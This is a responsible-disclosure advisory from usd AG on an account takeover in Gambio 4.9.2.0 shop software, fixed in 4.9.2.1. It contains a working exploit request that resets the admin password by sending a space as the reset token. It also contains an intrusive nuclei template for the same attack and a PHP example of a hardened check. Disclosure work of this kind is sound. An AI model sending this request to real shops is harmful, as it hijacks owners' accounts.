usd-2024-0002 | Gambio 4.9.2.0 - Account Takeover

Product: Gambio
Affected Version: 4.9.2.0 (with Security Update 2024-01 v1.0)
Vulnerability Type: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
Security Risk: Critical
Vendor URL: https://www.gambio.de/
Vendor Status: Fixed
CVE number: Pending

Description

Gambio is a software program that is specifically designed for running online shops.
It provides various features and tools to help businesses manage their inventory, process orders, and handle customer interactions.

According to their homepage, the software is used by more than 25,000 shops.

The password reset functionality checks for the existence of a password recovery token.
However, this check can be bypassed by submitting a single space character ("%20") as the token.

Proof of Concept

The password reset functionality utilizes the password_double_opt.php file with multiple possible actions defined in the "action" parameter.
The file loads the PasswordDoubleOptContentControl.inc.php file and executes the proceed method.

If the action is set to save_password, a database query is performed to fetch the customer specified in the POST parameter customers_id together with the reset token defined in the key parameter.
Attackers can submit customers_id as an integer; the initial admin account usually has the id "1".

In line 138 of the PasswordDoubleOptContentControl.inc.php file, the application checks whether the previous database query returned no rows or whether the key is an empty string; only in one of these cases is the request rejected.

[...]
if (!xtc_db_num_rows($check_customer_query) || $this->v_data_array['POST']['key'] == "")
{
    $case = 'no_account';
}
else
{
    $newpass = $this->v_data_array['POST']['newPassword'];
[...]

The if statement shown in line 1 of the snippet above can be made to evaluate to "false" by submitting a space character ("%20") as the key.
The password provided in the request is then set for the customer defined in customers_id without knowledge of the key.

An example request is shown below:

POST /password_double_opt.php?action=save_password HTTP/1.1
Host: localhost[...]

newPassword=changeme2&confirmedPassword=changeme2&customers_id=1&key=%20

A nuclei template was created to test for the vulnerability:

id: gambio-account-takeover

info:
  name: Account Takeover in Gambio
  description: Account Takeover in Gambio
  tags: gambio,php,intrusive
  author: ChristianPoeschl,EdwinHoffmann
  severity: critical

variables:
  customerid: 1
  password: "somethingreallylong123"

http:
  - raw:
      - |
        POST /password_double_opt.php?action=save_password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        newPassword={{password}}&confirmedPassword={{password}}&customers_id={{customerid}}&key=%20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: word
        part: header
        words:
          - "GXsid_"

Fix

The password reset token should be properly validated.
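The vulnerable check from the snippet in the Proof of Concept section next to a hardened validation of the kind this Fix section asks for, as an added example that is not Gambio's code: the customers table is a constructed in-memory array, the column name password_reset_key is assumed, and the lookup ignoring trailing spaces is an assumption standing in for whatever made the original query match a blank key.

```php
<?php
// Added example, not Gambio's code: the empty-key check described in the
// advisory beside a hardened validation. The customers "table" is a
// constructed in-memory array; its column name is an assumption.
$customers = [
    1 => ['customers_id' => 1, 'password_reset_key' => ''],             // no reset pending
    2 => ['customers_id' => 2, 'password_reset_key' => 'a1b2c3d4e5f6'], // constructed token
];

// Stand-in for the SQL lookup. It ignores trailing spaces on both sides,
// so a blank key matches an empty stored token (assumption about why the
// original query returned a row for key=%20).
function find_customer_by_key(array $customers, int $id, string $key): ?array
{
    foreach ($customers as $row) {
        if ($row['customers_id'] === $id
            && rtrim($row['password_reset_key']) === rtrim($key)) {
            return $row;
        }
    }
    return null;
}

// Vulnerable logic as described in the advisory: only an exactly empty key
// is rejected, so a single space passes both conditions.
function vulnerable_check(array $customers, int $id, string $key): bool
{
    $row = find_customer_by_key($customers, $id, $key);
    return $row !== null && $key != "";
}

// Hardened logic: reject a blank key before the lookup, require that a
// reset token is actually pending, and compare it in constant time.
function hardened_check(array $customers, int $id, string $key): bool
{
    if (trim($key) === '' || !isset($customers[$id])) {
        return false;
    }
    $stored = $customers[$id]['password_reset_key'];
    if ($stored === '') {
        return false; // no reset was requested for this account
    }
    return hash_equals($stored, $key);
}

foreach ([[1, ' '], [1, ''], [2, 'a1b2c3d4e5f6'], [2, 'wrong']] as [$id, $key]) {
    printf("id=%d key=%s vulnerable=%s hardened=%s\n", $id, var_export($key, true),
        var_export(vulnerable_check($customers, $id, $key), true),
        var_export(hardened_check($customers, $id, $key), true));
}
```

The loop shows that only the hardened check rejects the blank key for the account with no pending reset while still accepting the real token for the account that requested one.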

References

https://www.gambio.de

Timeline

2024-01-17: Vulnerability identified by Christian Poeschl and Edwin Hoffmann.
2024-01-26: First contact request via email to info@gambio.de.
2024-01-26: Received an update by Gambio that the incident is in internal review and will be fixed in an upcoming release.
2024-02-14: Gambio 4.9.2.1 fixes this issue.
2024-04-24: This advisory is published.

Credits

This security vulnerability was identified by Christian Poeschl and Edwin Hoffmann of usd AG.